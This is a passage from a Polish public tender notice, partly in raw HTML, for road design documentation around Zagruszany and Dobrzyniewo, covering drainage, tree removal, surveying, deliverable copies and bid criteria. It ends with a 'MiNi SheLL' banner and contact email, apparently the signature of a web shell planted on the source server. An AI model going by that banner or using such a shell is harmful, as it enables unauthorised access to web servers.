Rozwiązanie skrzyżowań z drogami gminnymi.  Jeden zjazd do jednej działki w uzgodnionej z właścicielem lokalizacji. Zatoki autobusowe w lokalizacji uzgodnionej komisyjnie. Komisję, na wniosek wykonawcy dokumentacji, powoła Zamawiający.  Renowacja rowów wg potrzeb, przebudowa przepustów, dostosowanie przepustów do odbioru wód opadowych z jezdni i chodników; budowa  przepustów w obrębie skrzyżowań; budowy studzienek ściekowych z wyprowadzeniem wód opadowych do rowu przydrożnego; zastosowania obniżonych ścieków przykrawężnikowych w m. Dobrzyniewo Koście, Ogrodniki i ew. w m. Dobrzyniewo Duże.
2.5.	Propozycje dotyczące zadrzewienia
Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu lub kolidujące z przebudową drogi.
Drzewa przewidziane do wycinki należy ponumerować na mapie syt-wys.
Przewidzieć do wycinki i karczowania zbędne zakrzaczenie. Przewidzieć do usunięcia wszystkie karcze.
2.6	  Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  
W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres przełożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe.
 
3	  ZAKRES OPRACOWANIA
3.1  Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na budowę. Zamawiający przewiduje uzyskanie zgody na realizację inwestycji drogowej w ramach  Specu-stawy drogowej. Projekt wykonać na aktualnej mapie do celów projektowych. Tytuł projektu budowlanego uzgodnić z Zamawiającym.

Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białym-stoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.

3.2 . Dodatkowo należy opracować:
       -     operaty wodnoprawne - przebudowa przepustów; odprowadzenie wód opadowych do ziemi 
             lub do wód,               
       -     badania geotechniczne podłoża nawierzchni wykonane co 100m, a w przypadku gruntów 
             wątpliwych z częstotliwością umożliwiającą opracowanie przekroi   geologicznych,
       -     pomiary ruchu i prognozę ruchu na 20 lat
-	projekt stałej organizacji ruchu, 
      
 Dokumentację należy przekazać:

            a. Materiały do opiniowania ze Specustawy drogowej  
                wraz z naniesionymi na mapę projektowanymi 
               podziałami działek                                                                                        - 6 egz.
            b. mapa do celów projektowych w skali 1:500                                                 - 1 egz.
c. Projekt budowlany                                                                                       - 4 egz.
      d. Projekt wykonawczy (techniczny) branża drogowa 
          z częścią przedmiarową i ST                                                                       - 5 egz. 
       e. Projekt wykonawczy (techniczny) przebudowa przepustów pod koroną drogi, 
          z częścią przedmiarową i ST                                                                       - 5 egz.
      f. Operaty wodnoprawne (przebudowa przepustów, odprowadzenie wód 
          opadowych do ziemi lub do wód) wersja papierowa - po 3egz. + wersja elektroniczna - po 2 
          płytki
      g. Badania geotechniczne podłoża nawierzchni                        	                   - 2 egz. 
h. Plan wyrębu drzew i krzewów                                                                      - 3 egz.
i. Projekt stałej organizacji ruchu                                                                     - 4 egz.  
j. Pomiary ruchu i prognoza ruchu                                                                    - 2 egz.
 

             Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta


Obowiązuje przedstawienie do dnia 31.07.2015r. koncepcji w wersji elektronicznej   zawierającej rozwiązania sytuacyjne i wysokościowe (zagospodarowanie terenu, profil podłużny drogi z projektowaną niweletą), do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych.

Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.

3.3.	Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: Przebudowę z rozbudową drogi powiatowej Nr 1489 B na odcinku Pasynki - Zagruszany (Gm. Zabłudów).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący (dane ewidencyjne podlegające weryfikacji przez Projektanta)
1.1	Szerokość istniejącej jezdni i korona
Od km rob. 0+000 (koniec nawierzchni bitumicznej w m. Pasynki) do km rob. ok. 1+750 (koniec nawierzchni brukowej w m. Zagruszany) 
- od km rob. 0+000 do km rob. ok. 1+350 - przekrój szlakowy, droga gruntowa ulepszona żwirem; szer. pasa drogowego 15m,
- od km rob. ok. 1+350 do km rob. ok. 1+750 w m. Zagruszany - przekrój uliczny i szlakowy, jezdnia o naw. brukowej szer. 6,0m; szer. pasa drogowego 12,0m.
1.2	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
W miarę możliwości istniejącą jezdnię w m. Zagruszany wykorzystać jako podbudowę.  
1.3	Sytuacja trasy
Wymaga korekt. 
1.4	Obiekty inżynierskie
Przepusty:
-  1 przepust betonowy O 0,60m, L=8,3m - do przebudowy
 
1.5	Niweleta drogi
Niweleta drogi wymaga korekt.
1.6	Stan rowów i innych urządzeń odwadniających
Odwodnienie drogi wymaga:
renowacji rowów przydrożnych,
przebudowy przepustu pod koroną drogi,
budowy przepustów w obrębie skrzyżowań z drogami bocznymi,

W m. Zagruszany, w miejscu przepustu, wybudowano w 2011r. dwie studzienki ściekowe, z których wody opadowe odprowadzane są kanałem krytym O 0,40m na dług. 68,0m a następnie rowem otwartym do rzeki Rudnia.
2	DANE WYJŚCIOWE DO PROJEKTOWANIA - DROGA
2.1	Wnioskowany charakter robót: przebudowa z rozbudową 
2.2	Parametry techniczne do projektowania 
2.2.1. Prędkość projektowa Vp   -  w terenie zabudowanym - 40 lub 30 km/h - w terenie niezabudowanym - 50 lub 40 km/h 
2.2.2. Klasa drogi                       -   L 
2.2.3. Przekrój poprzeczny (normalny):
w miejscowości Zagruszany uliczny, szerokość jezdni 6,00m. Szerokość chodników pożądana 1,5m,   
poza terenem zabudowanym - przekrój szlakowy, szer. jezdni 5,50m,  szerokość korony drogi 8,0.
  2.3.  Konstrukcja (technologia) nawierzchni:  
2.3.3.	Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując 2017 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.3.3	Podbudowa - kruszywo naturalne lub łamane stabilizowane mechanicznie,
2.3.5.	Nawierzchnia - beton asfaltowy  
2.4. Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Rozwiązanie skrzyżowań z drogami gminnymi.  Jeden zjazd do jednej działki w uzgodnionej z właścicielem lokalizacji.  
Renowacja rowów wg potrzeb, przebudowa przepustu z dostosowaniem do migracji małych zwierząt, budowa przepustów w obrębie skrzyżowań, ew. budowa sieci kanalizacji deszczowej w m. Zagruszany z odprowadzeniem do istniejącego kanału krytego lub do rowu przydrożnego przy drodze gminnej Zagruszany - Łubniki.
2.5.	Propozycje dotyczące zadrzewienia
Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu lub kolidujące z przebudową drogi.
Drzewa przewidziane do wycinki należy ponumerować na mapie syt-wys.
Przewidzieć do wycinki i karczowania zbędne zakrzaczenie. Przewidzieć do usunięcia wszystkie karcze.
2.6	  Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  
W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres przełożenia urządzeń obcych oraz formę za-płaty za opracowanie branżowe.
 
3.     ZAKRES OPRACOWANIA

3.1.	Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na budowę. Zamawiający przewiduje uzyskanie zgody na realizację inwestycji drogowej w ramach  Specustawy drogowej. Projekt wykonać na aktualnej mapie do celów projektowych. Tytuł projektu budowlanego uzgodnić z Zamawiającym.

Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.

3.2. Dodatkowo należy opracować:
       -     operaty wodnoprawne - przebudowa przepustu pod koroną drogi, wyprowadzenie wód opadowych do wód lub do ziemi,
       -     badania geotechniczne podłoża nawierzchni wykonane co 100m, a w przypadku gruntów 
             wątpliwych z częstotliwością umożliwiającą opracowanie przekroi   geologicznych,
       -     pomiary ruchu i prognozę ruchu na 20 lat
-	projekt stałej organizacji ruchu, 

      
 Dokumentację należy przekazać:

            a. Materiały do opiniowania ze Specustawy drogowej  
                wraz z naniesionymi na mapę projektowanymi 
               podziałami działek                                                                                        - 7 egz.
            b. mapa do celów projektowych w skali 1:500                                                 - 1 egz.
c. Projekt budowlany                                                                                       - 4 egz.
      d. Projekt wykonawczy (techniczny) branża drogowa 
          z częścią przedmiarową i ST                                                                       - 5 egz. 
      e. Projekt wykonawczy (techniczny) przebudowa przepustu
         pod koroną drogi, z częścią przedmiarową i ST                                           - 5 egz.
      f. Projekt wykonawczy (techniczny) branża sanitarna (budowa odcinkowej sieci
          kanalizacji deszczowej) z częścią przedmiarową i ST                                 - 5 egz.
      g. Operaty wodnoprawne (przebudowa przepustu, wyprowadzenie wód opadowych do wód lub do ziemi) wersja papierowa - 3egz. + wersja elektroniczna -  2 płytki
      h. Badania geotechniczne podłoża nawierzchni                        	                   - 2 egz. 
i. Plan wyrębu drzew i krzewów                                                                      - 3 egz.
j. Projekt stałej organizacji ruchu                                                                     - 4 egz.   
k. Pomiary ruchu i prognoza ruchu                                                                  - 2 egz.
 

             Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta
Obowiązuje przedstawienie do dnia 31.07.2015r. koncepcji w wersji elektronicznej   zawierającej rozwiązania sytuacyjne i wysokościowe (zagospodarowanie terenu, profil podłużny drogi z projektowaną niweletą), do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych.
Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.
 
3.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com